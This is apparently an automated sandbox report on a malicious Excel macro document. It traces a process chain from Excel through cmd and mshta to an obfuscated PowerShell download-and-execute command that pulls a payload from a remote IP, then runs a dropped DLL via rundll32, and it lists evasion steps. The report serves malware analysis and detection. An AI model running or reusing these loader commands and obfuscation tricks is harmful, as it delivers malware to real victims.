Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B20E3A	14_2_00B20E3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1AC3A	14_2_00B1AC3A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B03C3C	14_2_00B03C3C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B03E3F	14_2_00B03E3F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1BE27	14_2_00B1BE27
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B09011	14_2_00B09011
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B04816	14_2_00B04816
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B20C14	14_2_00B20C14
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B10001	14_2_00B10001
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B18606	14_2_00B18606
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1907F	14_2_00B1907F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B05E60	14_2_00B05E60
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1A666	14_2_00B1A666
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1AE6D	14_2_00B1AE6D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B02051	14_2_00B02051
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B02251	14_2_00B02251
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B10E53	14_2_00B10E53
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B20056	14_2_00B20056
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B01A56	14_2_00B01A56
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B04C5D	14_2_00B04C5D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B16C49	14_2_00B16C49
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1044F	14_2_00B1044F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B209B5	14_2_00B209B5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B081B7	14_2_00B081B7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B051BB	14_2_00B051BB
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1C3A0	14_2_00B1C3A0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B17BA6	14_2_00B17BA6
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B213AD	14_2_00B213AD
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1E395	14_2_00B1E395
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B09B83	14_2_00B09B83
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B14B87	14_2_00B14B87
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1D389	14_2_00B1D389
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B07FF2	14_2_00B07FF2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B059F2	14_2_00B059F2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B0DFF3	14_2_00B0DFF3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B16DF8	14_2_00B16DF8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B195FA	14_2_00B195FA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B18BE3	14_2_00B18BE3
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1DBEA	14_2_00B1DBEA
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B17DD5	14_2_00B17DD5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B02BD9	14_2_00B02BD9
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B19BCF	14_2_00B19BCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B09DCF	14_2_00B09DCF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B0E5CF	14_2_00B0E5CF
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B20F33	14_2_00B20F33
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B07735	14_2_00B07735
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1473C	14_2_00B1473C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B08B3D	14_2_00B08B3D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1BB23	14_2_00B1BB23
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B06D24	14_2_00B06D24
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B09714	14_2_00B09714
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B14116	14_2_00B14116
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B18519	14_2_00B18519
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B10B19	14_2_00B10B19
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B0BB7E	14_2_00B0BB7E
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B05361	14_2_00B05361
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B08969	14_2_00B08969
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1176B	14_2_00B1176B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B12550	14_2_00B12550
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1CB5B	14_2_00B1CB5B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B0A55F	14_2_00B0A55F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B04346	14_2_00B04346
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B0CF47	14_2_00B0CF47
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B05548	14_2_00B05548
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B1894B	14_2_00B1894B
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 14_2_00B0B74D	14_2_00B0B74D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003BA03A	15_2_003BA03A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003A323F	15_2_003A323F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003A303C	15_2_003A303C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003C023A	15_2_003C023A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003BBA31	15_2_003BBA31
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003B9E30	15_2_003B9E30
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003A7037	15_2_003A7037
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003BE835	15_2_003BE835
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003BB227	15_2_003BB227
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003C0014	15_2_003C0014
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003A8411	15_2_003A8411
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003A3C16	15_2_003A3C16
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003AF401	15_2_003AF401

Source: 4B14.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Windows\SysWOW64\rundll32.exe

Process Stats: CPU usage > 98%

Source: 364453688149503140239183.xls	Macro extractor: Sheet name: GODVIN
Source: 364453688149503140239183.xls	Macro extractor: Sheet name: GODVIN

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76F90000 page execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Memory allocated: 76E90000 page execute and read and write	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 12_2_002DE249 DeleteService,

12_2_002DE249

Source: 364453688149503140239183.xls, type: SAMPLE	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f
Source: C:\Users\user\Desktop\364453688149503140239183.xls, type: DROPPED	Matched rule: SUSP_Excel4Macro_AutoOpen date = 2020-03-26, author = John Lambert @JohnLaTwC, description = Detects Excel4 macro use with auto open / close, score = 2fb198f6ad33d0f26fb94a1aa159fef7296e0421da68887b8f2548bbd227e58f

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Bwqooqqzlaw\

Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10032B38 appears 108 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100201F1 appears 34 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100200FD appears 72 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030D27 appears 288 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 1001F9FC appears 52 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 10030D5A appears 82 times
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: String function: 100359C1 appears 46 times

Source: 364453688149503140239183.xls	OLE indicator, VBA macros: true
Source: 364453688149503140239183.xls.0.dr	OLE indicator, VBA macros: true

Source: classification engine

Classification label: mal100.troj.expl.evad.winXLS@25/9@1/47

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: 364453688149503140239183.xls	OLE indicator, Workbook stream: true
Source: 364453688149503140239183.xls.0.dr	OLE indicator, Workbook stream: true

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_100125C0 _printf,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,_malloc,

9_2_100125C0

Source: 364453688149503140239183.xls

ReversingLabs: Detection: 18%

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ........................................................................`I.........v.....................K........l.............................	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../,k....................................}..v............0...............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w...................../,k..... ..............................}..v....h.......0.................l.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................P.,k....................................}..v............0...............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....................P.,k....x.l.............................}..v....8.......0.................l.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#.................,k....................................}..v....P.......0...............................h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....#.................,k....(.l.............................}..v............0.................l.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....'.................,k....E...............................}..v.....k......0...............x.l.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+.................,k....E...............................}..v............0...............x.l.............h...............	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Console Write: ................y=.w....+.......P.S. .C.:.\.U.s.e.r.s.\.A.l.b.u.s.\.D.o.c.u.m.e.n.t.s.>. .......0...............H.#.....:.......h...............	Jump to behavior

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\mshta.exe mshta http://91.240.118.168/vvv/ppp/fe.html	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({FdrggvdRf}{FdrggvdRf}Ne{FdrggvdRf}{FdrggvdRf}w{FdrggvdRf}-Obj{FdrggvdRf}ec{FdrggvdRf}{FdrggvdRf}t N{FdrggvdRf}{FdrggvdRf}et{FdrggvdRf}.W{FdrggvdRf}{FdrggvdRf}e'.replace('{FdrggvdRf}', ''); $c4='bC{FdrggvdRf}li{FdrggvdRf}{FdrggvdRf}en{FdrggvdRf}{FdrggvdRf}t).D{FdrggvdRf}{FdrggvdRf}ow{FdrggvdRf}{FdrggvdRf}nl{FdrggvdRf}{FdrggvdRf}{FdrggvdRf}o'.replace('{FdrggvdRf}', ''); $c3='ad{FdrggvdRf}{FdrggvdRf}St{FdrggvdRf}rin{FdrggvdRf}{FdrggvdRf}g{FdrggvdRf}(''ht{FdrggvdRf}tp{FdrggvdRf}://91.240.118.168/vvv/ppp/fe.png'')'.replace('{FdrggvdRf}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI\|I`E`X	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\ProgramData\QWER.dll",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",OOkfVaPZ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",xvIpPUnGjiWnFD	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm",DllRegisterServer	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",mYtMYmZ	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx",DllRegisterServer	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRE7DE.tmp

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp	Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe C:\ProgramData\QWER.dll BBDD

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Mutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking

Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\mshta.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: C:\Windows\System32\mshta.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Source: 4B14.tmp.0.dr

Initial sample: OLE indicators vbamacros = False

Data Obfuscation

Obfuscated command line found

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c ms^hta http://91.2^40.118.1^68/vvv/ppp/f^e.ht^m^l			Jump to behavior

Source: C:\Windows\System32\mshta.exe	Code function: 4_3_039408D2 push 8B490321h; iretd	4_3_039408D7
Source: C:\Windows\System32\mshta.exe	Code function: 4_3_039400BB push 8B490321h; iretd	4_3_039400C1
Source: C:\Windows\System32\mshta.exe	Code function: 4_3_039408D2 push 8B490321h; iretd	4_3_039408D7
Source: C:\Windows\System32\mshta.exe	Code function: 4_3_039400BB push 8B490321h; iretd	4_3_039400C1
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10032B7D push ecx; ret	9_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10030DFF push ecx; ret	9_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10032B7D push ecx; ret	11_2_10032B90
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10030DFF push ecx; ret	11_2_10030E12
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003C0C04 push ss; ret	15_2_003C0E40
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 15_2_003C0F14 push FFFFFFF8h; retf	15_2_003C0F23

Source: C:\Windows\SysWOW64\rundll32.exe

Code function: 9_2_1003D873 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,

9_2_1003D873

Source: QWER.dll.6.dr

Static PE information: real checksum: 0x8df98 should be: 0x9432d

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\ProgramData\QWER.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe	File created: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz (copy)			Jump to dropped file
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	File created: C:\ProgramData\QWER.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

File created: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz (copy)

Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Bwqooqqzlaw\cojfo.cqz:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Jcwhaivtpnbramh\xjgaylzytzzvl.srm:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Cdragpegkvqde\ljsxpi.ptx:Zone.Identifier read attributes \| delete	Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_100134F0 IsIconic,	9_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 9_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,	9_2_10018C9A
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_100134F0 IsIconic,	11_2_100134F0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 11_2_10018C9A IsIconic,GetWindowPlacement,GetWindowRect,	11_2_10018C9A

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
